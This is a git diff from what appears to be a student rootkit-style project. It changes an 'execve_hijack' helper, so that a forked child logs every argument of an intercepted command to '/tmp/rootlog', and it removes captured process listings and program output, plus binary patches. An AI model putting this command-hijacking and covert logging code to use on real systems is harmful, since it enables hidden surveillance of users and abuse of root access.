-osboxes     2469  3.3 11.4 57712392 711864 ?     Sl   Apr10 128:20 /usr/share/code/code --type=renderer --disable-color-correct-rendering --field-trial-handle=15541623923277986509,16096957837955962724,131072 --disable-features=CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --disable-gpu-compositing --lang=en-GB --enable-crash-reporter=92839825-0bbb-4be7-8b77-5add1429d30d,no_channel --global-crash-keys=92839825-0bbb-4be7-8b77-5add1429d30d,no_channel,_companyName=Microsoft,_productName=VSCode,_version=1.62.3 --user-data-dir=/home/osboxes/.config/Code --standard-schemes=vscode-webview,vscode-file --secure-schemes=vscode-webview,vscode-file --bypasscsp-schemes --cors-schemes=vscode-webview,vscode-file --fetch-schemes=vscode-webview,vscode-file --service-worker-schemes=vscode-webview --streaming-schemes --app-path=/usr/share/code/resources/app --no-sandbox --no-zygote --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --shared-files=v8_context_snapshot_data:100 --vscode-window-config=vscode:e78d9d58-8a32-4600-af52-391b6e1f47e9
-osboxes     2519  0.0  0.6 38046904 39364 ?      Sl   Apr10   1:50 /usr/share/code/code --ms-enable-electron-run-as-node --inspect-port=0 /usr/share/code/resources/app/out/bootstrap-fork --type=extensionHost --skipWorkspaceStorageLock
-osboxes     2527  0.2  2.1 38064792 133260 ?     Sl   Apr10  10:31 /usr/share/code/code --ms-enable-electron-run-as-node --inspect-port=0 /usr/share/code/resources/app/out/bootstrap-fork --type=extensionHost --skipWorkspaceStorageLock
-osboxes     2543  0.0  1.0 38113780 65348 ?      Sl   Apr10   3:19 /usr/share/code/code --type=renderer --disable-color-correct-rendering --field-trial-handle=15541623923277986509,16096957837955962724,131072 --disable-features=CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --disable-gpu-compositing --lang=en-GB --enable-crash-reporter=92839825-0bbb-4be7-8b77-5add1429d30d,no_channel --global-crash-keys=92839825-0bbb-4be7-8b77-5add1429d30d,no_channel,_companyName=Microsoft,_productName=VSCode,_version=1.62.3 --user-data-dir=/home/osboxes/.config/Code --standard-schemes=vscode-webview,vscode-file --secure-schemes=vscode-webview,vscode-file --bypasscsp-schemes --cors-schemes=vscode-webview,vscode-file --fetch-schemes=vscode-webview,vscode-file --service-worker-schemes=vscode-webview --streaming-schemes --app-path=/usr/share/code/resources/app --no-sandbox --no-zygote --disable-blink-features=Auxclick --node-integration-in-worker --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --shared-files=v8_context_snapshot_data:100 --vscode-window-config=vscode:8830000e-cce1-47f6-aef2-994e613d8006
-osboxes     2556  0.0  0.4 38022644 27700 ?      Rl   Apr10   0:53 /usr/share/code/code --ms-enable-electron-run-as-node /usr/share/code/resources/app/out/bootstrap-fork --type=watcherServiceChokidar
-osboxes     2573  0.0  0.2 38017524 15192 ?      Sl   Apr10   0:05 /usr/share/code/code --ms-enable-electron-run-as-node /usr/share/code/resources/app/out/bootstrap-fork --type=watcherServiceChokidar
-osboxes     2574  0.1  0.5 38082136 32284 ?      Sl   Apr10   6:28 /usr/share/code/code --ms-enable-electron-run-as-node /usr/share/code/resources/app/out/bootstrap-fork --type=ptyHost
-osboxes     2646  0.1  1.6 2276984 103136 ?      Sl   Apr10   7:04 /home/osboxes/.vscode/extensions/ms-vscode.cpptools-1.7.1/bin/cpptools
-osboxes     2674  0.0  0.1 1383820 6644 ?        Sl   Apr10   1:53 /home/osboxes/.vscode/extensions/ms-vscode.cpptools-1.7.1/bin/cpptools
-osboxes     2806  0.0  0.0  20028  2948 pts/0    Ss+  Apr10   0:00 /usr/bin/bash
-osboxes     2863  0.0  0.0  19892  1076 pts/1    Ss+  Apr10   0:00 /usr/bin/bash
-osboxes     2952  0.1  0.8 438936 51936 ?        Ssl  Apr10   4:37 /usr/libexec/gnome-terminal-server
-osboxes     2957  0.0  0.0  20044  3692 pts/2    Ss+  Apr10   0:00 bash
-osboxes     2965  0.0  0.1 425260  6816 ?        Sl   Apr10   0:04 update-notifier
-osboxes     3637  0.0  0.0  19892  1656 pts/3    Ss   Apr10   0:00 /usr/bin/bash
-osboxes     3859  0.0  0.0  20024  2196 pts/4    Ss+  Apr10   0:00 /usr/bin/bash
-osboxes     3964  0.0  0.0  20024  2200 pts/5    Ss+  Apr10   0:00 /usr/bin/bash
-osboxes     4255  0.1  1.3 2539068 84248 ?       Sl   Apr10   4:28 /usr/lib/firefox/firefox -contentproc -childID 8 -isForBrowser -prefsLen 9720 -prefMapSize 246643 -jsInitLen 279340 -parentBuildID 20220106144528 -appDir /usr/lib/firefox/browser 2072 true tab
-osboxes     4353  0.0  0.0 363164  2676 ?        Sl   Apr10   0:24 /usr/lib/speech-dispatcher-modules/sd_dummy /etc/speech-dispatcher/modules/dummy.conf
-osboxes     4356  0.0  0.0 463472  3112 ?        Sl   Apr10   0:24 /usr/lib/speech-dispatcher-modules/sd_espeak-ng /etc/speech-dispatcher/modules/espeak-ng.conf
-osboxes     4383  0.0  0.0 172516  1608 ?        Ssl  Apr10   0:00 /usr/bin/speech-dispatcher --spawn --communication-method unix_socket --socket-path /run/user/1000/speech-dispatcher/speechd.sock
-osboxes     4620  0.0  2.1 2590288 131536 ?      Sl   Apr10   0:21 /usr/lib/firefox/firefox -contentproc -childID 14 -isForBrowser -prefsLen 9720 -prefMapSize 246643 -jsInitLen 279340 -parentBuildID 20220106144528 -appDir /usr/lib/firefox/browser 2072 true tab
-osboxes     4795  0.0  1.4 2551052 87316 ?       Sl   Apr10   3:23 /usr/lib/firefox/firefox -contentproc -childID 19 -isForBrowser -prefsLen 9720 -prefMapSize 246643 -jsInitLen 279340 -parentBuildID 20220106144528 -appDir /usr/lib/firefox/browser 2072 true tab
-osboxes     5147  0.0  0.0  20040  3228 pts/6    Ss+  Apr10   0:00 bash
-osboxes     6267  0.0  0.0  20024  1732 pts/7    Ss+  Apr10   0:00 bash
-osboxes     6560  0.1 21.8 42230264 1351500 ?    Sl   Apr10   5:31 /usr/share/code/code --ms-enable-electron-run-as-node /home/osboxes/.vscode/extensions/ms-python.vscode-pylance-2022.1.3/dist/server.bundle.js --cancellationReceive=file:37ab5bf56c88bb15cd928b7c87a072b467ccf213df --node-ipc --clientProcessId=2527
-osboxes     9779  0.0  0.0  29552  1940 pts/6    T    Apr11   0:00 python3 ./nasmshell
-osboxes    15209  0.0  1.1 2599532 71016 ?       Sl   Apr11   0:20 /usr/lib/firefox/firefox -contentproc -childID 29 -isForBrowser -prefsLen 9720 -prefMapSize 246643 -jsInitLen 279340 -parentBuildID 20220106144528 -appDir /usr/lib/firefox/browser 2072 true tab
-osboxes    21807  0.0  2.2 2599956 141596 ?      Sl   Apr11   0:52 /usr/lib/firefox/firefox -contentproc -childID 33 -isForBrowser -prefsLen 9720 -prefMapSize 246643 -jsInitLen 279340 -parentBuildID 20220106144528 -appDir /usr/lib/firefox/browser 2072 true tab
-osboxes    21956  0.0  0.0 425964  3888 pts/2    Tl   Apr11   0:00 gdb ./execve_hijack
-osboxes    22013  0.0  0.0   2516   584 pts/2    t    Apr11   0:00 /home/osboxes/TFG/src/helpers/execve_hijack
-osboxes    33793  0.0  0.2 37983716 16372 ?      Sl   Apr11   0:07 /usr/share/code/code --ms-enable-electron-run-as-node /usr/share/code/resources/app/extensions/json-language-features/server/dist/node/jsonServerMain --node-ipc --clientProcessId=2527
-osboxes    33839  0.0  0.1 4956448 7436 ?        Sl   Apr11   0:23 /home/osboxes/.vscode/extensions/ms-vscode.cpptools-1.7.1/bin/cpptools-srv 2674 {4204C6E4-94DE-4C9A-87D5-451782A8EEA2}
-root       40451  0.0  0.0      0     0 ?        S<   Apr11   0:00 [loop15]
-osboxes    44149  0.0  1.3 2503468 86112 ?       Sl   Apr11   0:18 /usr/lib/firefox/firefox -contentproc -childID 40 -isForBrowser -prefsLen 9720 -prefMapSize 246643 -jsInitLen 279340 -parentBuildID 20220106144528 -appDir /usr/lib/firefox/browser 2072 true tab
-osboxes    44249  0.0  0.1 196936  6904 ?        Sl   Apr11   0:01 /usr/lib/firefox/firefox -contentproc -parentBuildID 20220106144528 -prefsLen 9720 -prefMapSize 246643 -appDir /usr/lib/firefox/browser 2072 true rdd
-osboxes    44288  0.1  1.3 2554840 83648 ?       Sl   Apr11   2:43 /usr/lib/firefox/firefox -contentproc -childID 43 -isForBrowser -prefsLen 9720 -prefMapSize 246643 -jsInitLen 279340 -parentBuildID 20220106144528 -appDir /usr/lib/firefox/browser 2072 true tab
-root       78150  0.0  0.2 1095204 14348 ?       Ssl  Apr11   0:09 /usr/lib/snapd/snapd
-osboxes   164528  0.2  0.6 3033220 39252 ?       Sl   Apr12   2:42 /usr/lib/firefox/firefox -contentproc -childID 110 -isForBrowser -prefsLen 9832 -prefMapSize 246643 -jsInitLen 279340 -parentBuildID 20220106144528 -appDir /usr/lib/firefox/browser 2072 true tab
-root      182268  0.0  0.4 118068 29556 ?        S<s  Apr12   0:07 /lib/systemd/systemd-journald
-osboxes   190198  0.0  0.1 815708 11768 ?        Sl   Apr12   0:01 /usr/bin/nautilus --gapplication-service
-root      219744  0.0  0.0  23140  3688 pts/3    S+   Apr12   0:00 sudo cat /sys/kernel/debug/tracing/trace_pipe
-root      219763  0.0  0.0  16888   448 pts/3    S+   Apr12   0:00 cat /sys/kernel/debug/tracing/trace_pipe
-root      239521  0.0  0.1  81196  9320 ?        Ss   03:20   0:00 /usr/sbin/cupsd -l
-root      239523  0.0  0.1 179080  8136 ?        Ssl  03:20   0:00 /usr/sbin/cups-browsed
-osboxes   240611  0.0  0.0 397868  5596 ?        Sl   03:42   0:00 /usr/libexec/gvfsd-network --spawner :1.3 /org/gtk/gvfs/exec_spaw/1
-osboxes   240624  0.0  0.0 325920  6092 ?        Sl   03:42   0:00 /usr/libexec/gvfsd-dnssd --spawner :1.3 /org/gtk/gvfs/exec_spaw/3
-osboxes   241549  0.0  0.6 2784548 39404 ?       Sl   04:36   0:00 gjs /usr/share/gnome-shell/extensions/ding@rastersoft.com/ding.js -E -P /usr/share/gnome-shell/extensions/ding@rastersoft.com -M 0 -D 72:27:1848:1053:1
-root      244694  0.0  0.0      0     0 ?        I    05:01   0:01 [kworker/2:1-events]
-root      246168  0.0  0.2 395496 18132 ?        Ssl  05:36   0:00 /usr/libexec/fwupd/fwupd
-root      249953  0.0  0.0      0     0 ?        I    06:22   0:00 [kworker/2:0-events]
-root      250021  0.0  0.0      0     0 ?        I    06:24   0:00 [kworker/0:1-events]
-root      250876  0.0  0.0      0     0 ?        I    06:32   0:00 [kworker/1:2-events]
-osboxes   250918  0.0  0.0  20040  5708 pts/8    Ss   06:34   0:00 bash
-root      251317  0.0  0.0      0     0 ?        I    06:41   0:00 [kworker/3:2-mm_percpu_wq]
-osboxes   251388  0.0  1.3 2414340 82276 ?       Sl   06:41   0:00 /usr/lib/firefox/firefox -contentproc -childID 148 -isForBrowser -prefsLen 9949 -prefMapSize 246643 -jsInitLen 279340 -parentBuildID 20220106144528 -appDir /usr/lib/firefox/browser 2072 true tab
-osboxes   251418  0.0  1.3 2414340 82076 ?       Sl   06:42   0:00 /usr/lib/firefox/firefox -contentproc -childID 149 -isForBrowser -prefsLen 9949 -prefMapSize 246643 -jsInitLen 279340 -parentBuildID 20220106144528 -appDir /usr/lib/firefox/browser 2072 true tab
-root      251560  0.0  0.0      0     0 ?        I    06:47   0:00 [kworker/3:0-events]
-root      251587  0.0  0.0      0     0 ?        I    06:48   0:00 [kworker/u8:2-events_unbound]
-osboxes   251667  0.0  1.3 2414340 82916 ?       Sl   06:51   0:00 /usr/lib/firefox/firefox -contentproc -childID 150 -isForBrowser -prefsLen 9949 -prefMapSize 246643 -jsInitLen 279340 -parentBuildID 20220106144528 -appDir /usr/lib/firefox/browser 2072 true tab
-root      251807  0.0  0.0      0     0 ?        I    06:55   0:00 [kworker/u8:0-ext4-rsv-conversion]
-root      251948  0.0  0.0      0     0 ?        I    06:58   0:00 [kworker/1:1-events]
-root      251949  0.0  0.0      0     0 ?        I    06:58   0:00 [kworker/0:2-events]
-osboxes   251961  0.0  0.0  19908  5404 pts/8    S    06:59   0:00 ./execve_hijack /usr/bin/ls -l -a
-osboxes   252029  0.0  0.2 4956124 17428 ?       Sl   07:00   0:00 /home/osboxes/.vscode/extensions/ms-vscode.cpptools-1.7.1/bin/cpptools-srv 2646 {A9B50C18-C7D3-405F-BC30-E651DCC7B5A4}
-root      252479  0.0  0.0   3484  1936 pts/8    S    07:03   0:00 ./execve_hijack ,
-root      252524  0.0  0.0   2516    96 pts/8    S    07:05   0:00 ./execve_hijack -l -a
-root      252536  0.0  0.0      0     0 ?        I    07:06   0:00 [kworker/u8:1-events_unbound]
-osboxes   252543  0.0  0.0  21296  3756 pts/8    R+   07:06   0:00 ps -aux
-Hello world from execve hijacker
-Argument 0 is ./execve_hijack
-Argument 1 is ,
-I am the child with pid 252479
-Child process is exiting
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-IP: 127.0.1.1
-Packet of length 46 sent to 16842879
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Received client message
-Connection closed by request
-Hello world from execve hijacker
-Argument 0 is ./execve_hijack
-Argument 1 is -l
-Argument 2 is -a
-I am the child with pid 252524
-Child process is exiting
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-IP: 127.0.1.1
-Packet of length 46 sent to 16842879
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Packet of protocol 6 detected
-Received client message
-Connection closed by request
diff --git a/src/helpers/execve_hijack b/src/helpers/execve_hijack
index 53d93a41482873754c3f3cd00fbbee65ca147dbe..1633e22b464f7ab164ca4c5754057a476ef29417 100755
GIT binary patch
delta 3199
zcmZ`*3s6+&6~6ZZihzKk$nF9QySxNk9z|m!G+?uEK~Ri>nhMqUh|elD8=pv$b=z#0
zMd)eNI;moZ)Yy`dxcC@Tg(?OZorYMS3DyUK7X`$qktoUS_wNOw)9IaI&;OruzVAHu
zvXxCjWs^|j&X2el#yOvhj#2zu!kGJCZ$2o_XefHxCyzUswR-F1y&I-FN?klg`$T9t
zPPC6a7|cY<dB?|NKN38wC(ivS%cAvgJsAVEo|hvz?iiz!meHDkv9lU*msa<~!*03Z
zbZnHoU%bwE%J3G6S#652HcD3&Z7;NqmKJ<6(tGhXOAB2N(0S*;Y<B8-rW&paPftQ9
z0R3QTv|JcKbXEfP9D&j1G>N-J`<OF~5+UnZWWGhT`7)|pmAd5k_s_92s{ik=82J{T
zBiy!nQ>o3;3e9nzG217WMmSSi>7-*kNS28y7S=SM(&@4+zlfO65OW))mjM~Dj8wRc
z3RegW=w%3y2#^A$h@zkQI4f~#E%he-i=@E{w7rk|RcgPn%I#F2EGv`x>KTn!M+AjH
zfo}96Gtv45CVU}$aF#%>Qfq|6;bc_@@!hmv9UZ^V6CuqF@s|3Hn9B22M*xSMx}OY|
zfJ;pu@fzLq5SUoLAA3XEQ&hN0AHYwv8OyN)9IMKv2>V380p|=>ven|Ql>7tMwT?|r
zilZWpPIVr4MmZblqjU{uzko^_L)98>!bu#JDmOX9C@gUAQ1;6gq$k<5>NsD3+MiIr
zCXs)S;sPg4GYofD=qsAL++|aXY-*BC^|I-hY^sqSjBwgm^%GvK{vExu`jqdUtDd8p
zz_BsMA3LjKAz8wI$JKn|3fj&2Y<mep;eq9!-%)SiI6i>fgHndQ0Y1q@(}H4xvT#(2
z`I2FcmAuVZImKAIrBV9vF;UPppG7*>3}3XfMzoJzNF~9l*mck;s81iU1YokIx{KCR
z&braA*M}TRsUdil=cCX;fPr+{i6xD=OY49|vHtKs!|r-yP=`unX&x)f+A0-6T8&la
z;wo;V7u-H$ZvB8Ujp<cs=0n)oUR4e8?|}-6gUnN4XItL8He;!1y@W12#K72~T{-E=
zBf6;l+Us1%U}6>D(&r)ho-2kFaTFN(TEdENhmwqhNm7GTNivt6K*mY=O3X>j9!(XY
z8vfVxY3Q7Y|7f9j4+M2Qb32NY&Dd(L4_Rt8_V^q%_OO|SQnW7krNjqF)m+@inOHmi
z!GLi?z$G||wwzuxy6?Cbs6^|(81&B%s6?m6YVFnq@{8%HP8YH7K65qpG4qEwmp7k&
z=o9=jPqemU=X~psA}3{&tPAzbf?2tTP>ep552hS_qW80&p9t>vkX`=@zmA&p@#-wR
zqa}OqU@@n05^cr4($gLq9X6i#q2#a-a1?|kd0Ukvj<F=Jb<^H39Y2pwg&9ZsDTYs&
z;Vl{yZW(?)5UgE2R2hDR52HB|#&Ly6z-qi=F1{i=dvQqvkE`9}h{zsw_MUSXerQn*
zQ*S2U$OQj+T@2A`E^g&EGSi=!DT(GphWhWuQCZX`KyAh=2prty{3@8}uaT330=pTu
z+FV>Mn|=lCAJxF_1fgg**3*sXaWpzAhu=&KqM|hCL18u4nu}{WAL|Y_27Ag5=HGdb
zE=PyZ>8Ls(>Mq@nNnz!VpQh`+>m=`N!1#wEEC>K%5iCOy(xY>Pj80k@6{*?N`M)9F
zWPrn+2yrvu^*g{>PhrCN-;#s(n{yA&bx=!8kZ|G-i!JnYkRdk3>%RYB=@&a_eeB!X
zx<rn%<<;U9Z-EITP#WXTC~d}1C^#yL5+_vi$#i|fD|`Z}4Ozma+qBe>&u^s@hBx^b
z3W+lat+y#RPAi;kqoO#Cu;(_F#myCFx6#U<Wl~C_2Th4j7n<7~=J+ppq3<SX3}Lh(
zQRBb!rZY_6(#F(bcr_+mKvAb}(1FCsd?wvW{GIUCbx;(=FD+;Lnl>lfp5hn9acTLP
z)=O!5nbyZ?v(v2od7^!SE7Y^H$N#|Ip;C#%JL!GTL#gk&mi+vxEVrW5kFUwHm%wql
z>#`gR*#wylS&IzTLi*jp*8*}2WG&==$P17++hq9>q+5q92e@$DT1l3ZA!{M$L+UWI
zZIBbO233&fAR8d(V_R;!aM2uF8&_A3TZRn|gPehFe+}|F<YLG%_{wa9+(zS#-{gpH
z*dU{~?{9@)j2!0js+-qvcP<vHF8sZ5S(cB&bI6{%-KEUc?p8X?JltiED|2-|`0{Xp
zDETJMOxN-~RD{pBsUlr3Bwwc^>A_gsi|Km4p1z0SEU7ZId^^3Ip~q)IhF%xjjszLe
zU>chh<}j#Mp%c07^p}hXeg`!JXr;~!t-wj-AqER;C5je<c^hSlS|Rx^t$@zu9{nD=
zb#y?~@*hyMn8DXLMrH1F;hP)>vOjY1NYJrZ9Cyf-J`?<DNv^L)8-6&jr`gS^`VgvW
z)&x9<c&F+NRD}jbm979ELsf-kX3yUguke{FAwlOzo%zg#KSs%U3BrsBT9X&g_flnE
zs^A(%xAM*jg?g&V&w?ZM=O5wQ9F93TZbDi#2?cp5Wo|)^5EMoG3ySzQQWdV}s~r`E
zd)z<~zxaK=njDLl355nn(2{*F{J*Jg*+OAb0_m0~^1CQ+`C`F6o<3h*AQZ)sdc`6*
zQppMnU*&LHxrP@sN%YRD*@$s=RUvfItB<?0bURF`0@8@wP$MANl}%Qj1z5BtTYyu|
z)?Hqz`Xr@Hwkzx@!mvl<XGJwFwCzV`BTDP|CTcES&+46OPgkWyD~>BMKKA?u3(5dC
z+Gk&n)~L$jSR1m+rVFAQ?Jhf_8f>l~sM+&N>>We2(emvXteivJ3x(Vy8eLw7O81qI
zQxEq3jsoD84a7iS&zBn#Hw7tr=K|xHh2$BbD_bi(T?2s@4CvAG#0mpiy09XSb?Ofl
o=_>bl#kX7$+&2Thy^aSJGe!zVElu5P7|}G)ohHY|z58AN3#gJpHUIzs

delta 3222
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

diff --git a/src/helpers/execve_hijack.c b/src/helpers/execve_hijack.c
index 01aa8de..55cc968 100644
--- a/src/helpers/execve_hijack.c
+++ b/src/helpers/execve_hijack.c
@@ -65,7 +65,7 @@ char* execute_command(char* command){
     return res;
 }
 
-int hijacker_process_routine(char* argv[]){
+int hijacker_process_routine(int argc, char* argv[]){
     int fd = open("/tmp/rootlog", O_RDWR | O_CREAT | O_TRUNC, 0666);
     if(fd<0){
         perror("Failed to open log file");
@@ -86,10 +86,13 @@ int hijacker_process_routine(char* argv[]){
     }
     write(fd, "\t", 1);
     
-    ii = 0;
-    while(*(argv[0]+ii)!='\0'){
-        write(fd, argv[0]+ii, 1);
-        ii++;
+    for(int jj = 0; jj<argc; jj++){
+        ii = 0;
+        while(*(argv[jj]+ii)!='\0'){
+            write(fd, argv[jj]+ii, 1);
+            ii++;
+        }
+        write(fd, "\t", 1);
     }
 
     write(fd, "\n", 1);
@@ -188,7 +191,7 @@ int main(int argc, char* argv[], char *envp[]){
         //Child process
         printf("I am the child with pid %d\n", (int) getpid());
         printf("Child process is exiting\n");
-        hijacker_process_routine(argv);
+        hijacker_process_routine(argc, argv);
         exit(0);
     }
     //Parent process. Call original hijacked command
diff --git a/src/helpers/execve_hijack.o b/src/helpers/execve_hijack.o
index a0799ae2567f74811897cd38a0f1c7f6d00366cf..68eafa48d877a9b4edb9c83e03518a6492bffe88 100644
GIT binary patch
delta 2121
zcmaKrS!h#16oxZ5txcMmMa9WY+cdW>tqW+yU1;1Yi4TIPFDhcemsW6rxFXcHMq5+C
zdR!{FD<X<Z3AH}7&??djf~mMv5YY#rA}AG61Zg~zJ0r&nabS`=|M#DN&dg1QRy0M9
zmupR-_NiZ3eslNJk#suJ+|dI?T6}a07d9N9XC~q)xTBRjgu=w)owl&z(<Nkm@xQLB
zMEr#)Z;Koo_gK_L67e1(uv8@B6;);S&}<p;f2SG4Ql9&^Lp{4%pv$i7jhS@ZU6d}0
zi%vZ)tJ3MTpvijsw_Fy6m~*mY-N8gvOQiW#^1SmGOSZYbYepm&+o^JU4{OUtkFtkz
z3-TPc=_nl#ZQ|&J+irjEg&fpjxFnbyat|_RrU>B)sP^#Wd+%cA^yOvjw$9{~G0*He
